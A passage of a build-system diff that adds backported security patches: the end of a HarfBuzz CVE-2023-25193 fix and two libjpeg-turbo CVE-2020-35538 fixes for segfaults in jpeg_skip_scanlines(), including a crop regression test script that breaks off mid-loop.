+ /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int j = skippy_iter.idx;
+ unsigned int lig_index = (this+ligatureCoverage).get_coverage (buffer->info[j].codepoint);
+ if (lig_index == NOT_COVERED) return_trace (false);
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 5a7e564..437123c 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
+ uint32_t random_state;
+
+
++ signed last_base = -1; // GPOS uses
++ unsigned last_base_until = 0; // GPOS uses
++
+ hb_ot_apply_context_t (unsigned int table_index_,
+ hb_font_t *font_,
+ hb_buffer_t *buffer_) :
+@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
+ iter_context.init (this, true);
+ }
+
+- void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
++ void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
+ void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
+ void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
+ void set_random (bool random_) { random = random_; }
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
index ee08c12bee..0cfe01f1e5 100644
--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
-SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz"
+SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
+ file://CVE-2023-25193-pre0.patch \
+ file://CVE-2023-25193-pre1.patch \
+ file://CVE-2023-25193.patch"
SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
+From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 23 Jul 2020 21:24:38 -0500
+Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
+
+The additional segfault mentioned in #244 was due to the fact that
+the merged upsamplers use a different private structure than the
+non-merged upsamplers. jpeg_skip_scanlines() was assuming the latter, so
+when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
+of the IDCT method pointers in the merged upsampler's private structure.
+
+For reasons unknown, the test image in #441 did not encounter this
+segfault (too small?), but it encountered an issue similar to the one
+fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
+necessary to set up a dummy postprocessing function in
+read_and_discard_scanlines() when merged upsampling was enabled.
+Failing to do so caused either a segfault in merged_2v_upsample() (due
+to a NULL pointer being passed to jcopy_sample_rows()) or an error
+("Corrupt JPEG data: premature end of data segment"), depending on the
+number of scanlines skipped and whether the first scanline skipped was
+an odd- or even-numbered row.
+
+Fixes #441
+Fixes #244 (for real this time)
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog.md | 7 +++++
+ jdapistd.c | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
+ jdmerge.c | 46 +++++++--------------------------
+ jdmerge.h | 47 ++++++++++++++++++++++++++++++++++
+ jdmrg565.c | 10 ++++----
+ jdmrgext.c | 6 ++---
+ 6 files changed, 135 insertions(+), 53 deletions(-)
+ create mode 100644 jdmerge.h
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 2ebfe71..19d18fa 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
++2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
++in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
++images using the merged (non-fancy) upsampling algorithms (that is, when
++setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
++but it did not cover all cases.
++
++
+ 2.0.3
+ =====
+
+diff --git a/jdapistd.c b/jdapistd.c
+index 2c808fa..91da642 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -21,6 +21,8 @@
+ #include "jinclude.h"
+ #include "jdmainct.h"
+ #include "jdcoefct.h"
++#include "jdmaster.h"
++#include "jdmerge.h"
+ #include "jdsample.h"
+ #include "jmemsys.h"
+
+@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+
+
++/* Dummy postprocessing function used by jpeg_skip_scanlines() */
++LOCAL(void)
++noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
++ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
++{
++}
++
++
+ /*
+ * In some cases, it is best to call jpeg_read_scanlines() and discard the
+ * output, rather than skipping the scanlines, because this allows us to
+@@ -316,11 +328,17 @@ LOCAL(void)
+ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ JDIMENSION n;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION input_row, JSAMPARRAY output_buf,
+ int num_rows) = NULL;
+ void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ JSAMPARRAY output_buf, int num_rows) = NULL;
++ void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION *in_row_group_ctr,
++ JDIMENSION in_row_groups_avail,
++ JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
++ JDIMENSION out_rows_avail) = NULL;
+
+ if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+ color_convert = cinfo->cconvert->color_convert;
+@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->cquantize->color_quantize = noop_quantize;
+ }
+
++ if (master->using_merged_upsample && cinfo->post &&
++ cinfo->post->post_process_data) {
++ post_process_data = cinfo->post->post_process_data;
++ cinfo->post->post_process_data = noop_post_process;
++ }
++
+ for (n = 0; n < num_lines; n++)
+ jpeg_read_scanlines(cinfo, NULL, 1);
+
+@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+
+ if (color_quantize)
+ cinfo->cquantize->color_quantize = color_quantize;
++
++ if (post_process_data)
++ cinfo->post->post_process_data = post_process_data;
+ }
+
+
+@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+ my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+ my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_master_ptr master = (my_master_ptr)cinfo->master;
+ JDIMENSION i, x;
+ int y;
+ JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+ main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+
+ /* Skipping is much simpler when context rows are not required. */
+@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_scanline += lines_left_in_iMCU_row;
+ main_ptr->buffer_full = FALSE;
+ main_ptr->rowgroup_ctr = 0;
+- upsample->next_row_out = cinfo->max_v_samp_factor;
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->spare_full = FALSE;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->next_row_out = cinfo->max_v_samp_factor;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ }
+ }
+
+@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+ increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+ }
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample =
++ (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+ return num_lines;
+ }
+
+@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+ * output_scanline.
+ */
+- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ if (master->using_merged_upsample) {
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ } else {
++ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++ }
+
+ /* Always skip the requested number of lines. */
+ return num_lines;
+diff --git a/jdmerge.c b/jdmerge.c
+index dff5a35..833ad67 100644
+--- a/jdmerge.c
++++ b/jdmerge.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
+- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+@@ -40,41 +40,13 @@
+ #define JPEG_INTERNALS
+ #include "jinclude.h"
+ #include "jpeglib.h"
++#include "jdmerge.h"
+ #include "jsimd.h"
+ #include "jconfigint.h"
+
+ #ifdef UPSAMPLE_MERGING_SUPPORTED
+
+
+-/* Private subobject */
+-
+-typedef struct {
+- struct jpeg_upsampler pub; /* public fields */
+-
+- /* Pointer to routine to do actual upsampling/conversion of one row group */
+- void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+- JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
+-
+- /* Private state for YCC->RGB conversion */
+- int *Cr_r_tab; /* => table for Cr to R conversion */
+- int *Cb_b_tab; /* => table for Cb to B conversion */
+- JLONG *Cr_g_tab; /* => table for Cr to G conversion */
+- JLONG *Cb_g_tab; /* => table for Cb to G conversion */
+-
+- /* For 2:1 vertical sampling, we produce two output rows at a time.
+- * We need a "spare" row buffer to hold the second output row if the
+- * application provides just a one-row buffer; we also use the spare
+- * to discard the dummy last row if the image height is odd.
+- */
+- JSAMPROW spare_row;
+- boolean spare_full; /* T if spare buffer is occupied */
+-
+- JDIMENSION out_row_width; /* samples per output row */
+- JDIMENSION rows_to_go; /* counts rows remaining in image */
+-} my_upsampler;
+-
+-typedef my_upsampler *my_upsample_ptr;
+-
+ #define SCALEBITS 16 /* speediest right-shift on some machines */
+ #define ONE_HALF ((JLONG)1 << (SCALEBITS - 1))
+ #define FIX(x) ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
+@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
+ LOCAL(void)
+ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ int i;
+ JLONG x;
+ SHIFT_TEMPS
+@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ METHODDEF(void)
+ start_pass_merged_upsample(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Mark the spare buffer empty */
+ upsample->spare_full = FALSE;
+@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 2:1 vertical sampling case: may need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ JSAMPROW work_ptrs[2];
+ JDIMENSION num_rows; /* number of rows returned to caller */
+
+@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 1:1 vertical sampling case: much easier, never need a spare row. */
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+
+ /* Just do the upsampling. */
+ (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
+@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ GLOBAL(void)
+ jinit_merged_upsampler(j_decompress_ptr cinfo)
+ {
+- my_upsample_ptr upsample;
++ my_merged_upsample_ptr upsample;
+
+- upsample = (my_upsample_ptr)
++ upsample = (my_merged_upsample_ptr)
+ (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
+- sizeof(my_upsampler));
++ sizeof(my_merged_upsampler));
+ cinfo->upsample = (struct jpeg_upsampler *)upsample;
+ upsample->pub.start_pass = start_pass_merged_upsample;
+ upsample->pub.need_context_rows = FALSE;
+diff --git a/jdmerge.h b/jdmerge.h
+new file mode 100644
+index 0000000..b583396
+--- /dev/null
++++ b/jdmerge.h
+@@ -0,0 +1,47 @@
++/*
++ * jdmerge.h
++ *
++ * This file was part of the Independent JPEG Group's software:
++ * Copyright (C) 1994-1996, Thomas G. Lane.
++ * libjpeg-turbo Modifications:
++ * Copyright (C) 2020, D. R. Commander.
++ * For conditions of distribution and use, see the accompanying README.ijg
++ * file.
++ */
++
++#define JPEG_INTERNALS
++#include "jpeglib.h"
++
++#ifdef UPSAMPLE_MERGING_SUPPORTED
++
++
++/* Private subobject */
++
++typedef struct {
++ struct jpeg_upsampler pub; /* public fields */
++
++ /* Pointer to routine to do actual upsampling/conversion of one row group */
++ void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++ JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
++
++ /* Private state for YCC->RGB conversion */
++ int *Cr_r_tab; /* => table for Cr to R conversion */
++ int *Cb_b_tab; /* => table for Cb to B conversion */
++ JLONG *Cr_g_tab; /* => table for Cr to G conversion */
++ JLONG *Cb_g_tab; /* => table for Cb to G conversion */
++
++ /* For 2:1 vertical sampling, we produce two output rows at a time.
++ * We need a "spare" row buffer to hold the second output row if the
++ * application provides just a one-row buffer; we also use the spare
++ * to discard the dummy last row if the image height is odd.
++ */
++ JSAMPROW spare_row;
++ boolean spare_full; /* T if spare buffer is occupied */
++
++ JDIMENSION out_row_width; /* samples per output row */
++ JDIMENSION rows_to_go; /* counts rows remaining in image */
++} my_merged_upsampler;
++
++typedef my_merged_upsampler *my_merged_upsample_ptr;
++
++#endif /* UPSAMPLE_MERGING_SUPPORTED */
+diff --git a/jdmrg565.c b/jdmrg565.c
+index 1b87e37..53f1e16 100644
+--- a/jdmrg565.c
++++ b/jdmrg565.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+ * Copyright (C) 2013, Linaro Limited.
+- * Copyright (C) 2014-2015, 2018, D. R. Commander.
++ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+diff --git a/jdmrgext.c b/jdmrgext.c
+index b1c27df..c9a44d8 100644
+--- a/jdmrgext.c
++++ b/jdmrgext.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1994-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2011, 2015, D. R. Commander.
++ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr;
+@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ JDIMENSION in_row_group_ctr,
+ JSAMPARRAY output_buf)
+ {
+- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ register int y, cred, cgreen, cblue;
+ int cb, cr;
+ register JSAMPROW outptr0, outptr1;
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
@@ -0,0 +1,400 @@
+From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Mon, 27 Jul 2020 14:21:23 -0500
+Subject: [PATCH] Further jpeg_skip_scanlines() fixes
+
+- Introduce a partial image decompression regression test script that
+ validates the correctness of jpeg_skip_scanlines() and
+ jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
+ settings.
+
+ This regression test catches the following issues:
+ #182, fixed in 5bc43c7
+ #237, fixed in 6e95c08
+ #244, fixed in 398c1e9
+ #441, fully fixed in this commit
+
+ It does not catch the following issues:
+ #194, fixed in 773040f
+ #244 (additional segfault), fixed in
+ 9120a24
+
+- Modify the libjpeg-turbo regression test suite (make test) so that it
+ checks for the issue reported in #441 (segfault in
+ jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
+ conversion.)
+
+- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
+ h2v2 (4:2:0) merged upsampling/color conversion. The previous commit
+ fixed the segfault reported in #441, but that was a symptom of a
+ larger problem. Because merged 4:2:0 upsampling uses a "spare row"
+ buffer, it is necessary to allow the upsampler to run when skipping
+ rows (fancy 4:2:0 upsampling, which uses context rows, also requires
+ this.) Otherwise, if skipping starts at an odd-numbered row, the
+ output image will be incorrect.
+
+- Throw an error if jpeg_skip_scanlines() is called with two-pass color
+ quantization enabled. With two-pass color quantization, the first
+ pass occurs within jpeg_start_decompress(), so subsequent calls to
+ jpeg_skip_scanlines() interfere with the multipass state and prevent
+ the second pass from occurring during subsequent calls to
+ jpeg_read_scanlines().
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ CMakeLists.txt | 9 +++--
+ ChangeLog.md | 15 +++++---
+ croptest.in | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
+ jdapistd.c | 70 +++++++++++--------------------------
+ libjpeg.txt | 6 ++--
+ 5 files changed, 136 insertions(+), 59 deletions(-)
+ create mode 100755 croptest.in
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index aee74c9..de451f4 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -753,7 +753,7 @@ else()
+ set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
+ set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
+ set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
+- set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
++ set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
+ set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
+ set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
+ set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
+@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
+
+ if(WITH_ARITH_DEC)
+ # CC: RGB->YCC SAMP: h2v2 merged IDCT: ifast ENT: arith
+- add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
++ add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
+ testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
+ ${MD5_PPM_420M_IFAST_ARI})
+
+@@ -1266,6 +1266,11 @@ endforeach()
+ add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
+ ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
+
++configure_file(croptest.in croptest @ONLY)
++add_custom_target(croptest
++ COMMAND echo croptest
++ COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
++
+ if(WITH_TURBOJPEG)
+ configure_file(tjbenchtest.in tjbenchtest @ONLY)
+ configure_file(tjexampletest.in tjexampletest @ONLY)
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 19d18fa..4562eff 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+
+-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
+-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
+-images using the merged (non-fancy) upsampling algorithms (that is, when
+-setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
+-but it did not cover all cases.
++2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
++
++ - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
++errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
++4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
++is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a
++similar fix, but it did not cover all cases.
++ - `jpeg_skip_scanlines()` now throws an error if two-pass color
++quantization is enabled. Two-pass color quantization never worked properly
++with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
+
+
+ 2.0.3
+diff --git a/croptest.in b/croptest.in
+new file mode 100755
+index 0000000..7e3c293
+--- /dev/null
++++ b/croptest.in
+@@ -0,0 +1,95 @@
++#!/bin/bash
++
++set -u
++set -e
++trap onexit INT
++trap onexit TERM
++trap onexit EXIT
++
++onexit()
++{
++ if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++ fi
++}
++
++runme()
++{
++ echo \*\*\* $*
++ $*
++}
++
++IMAGE=vgl_6548_0026a.bmp
++WIDTH=128
++HEIGHT=95
++IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
++OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
++EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
++
++if [ -d $OUTDIR ]; then
++ rm -rf $OUTDIR
++fi
++mkdir -p $OUTDIR
++
++exec >$EXEDIR/croptest.log
++
++echo "============================================================"
++echo "$IMAGE ($WIDTH x $HEIGHT)"
++echo "============================================================"
++echo
++
++for PROGARG in "" -progressive; do
++
++ cp $IMGDIR/$IMAGE $OUTDIR
++ basename=`basename $IMAGE .bmp`
++ echo "------------------------------------------------------------"
++ echo "Generating test images"
++ echo "------------------------------------------------------------"
++ echo
++ runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
++ runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
++ echo
++
++ for NSARG in "" -nosmooth; do
++
++ for COLORSARG in "" "-colors 256 -dither none -onepass"; do
++
++ for Y in {0..16}; do
++
++ for H in {1..16}; do
++
++ X=$(( (Y*16)%128 ))
++ W=$(( WIDTH-X-7 ))
++ if [ $Y -le 15 ]; then
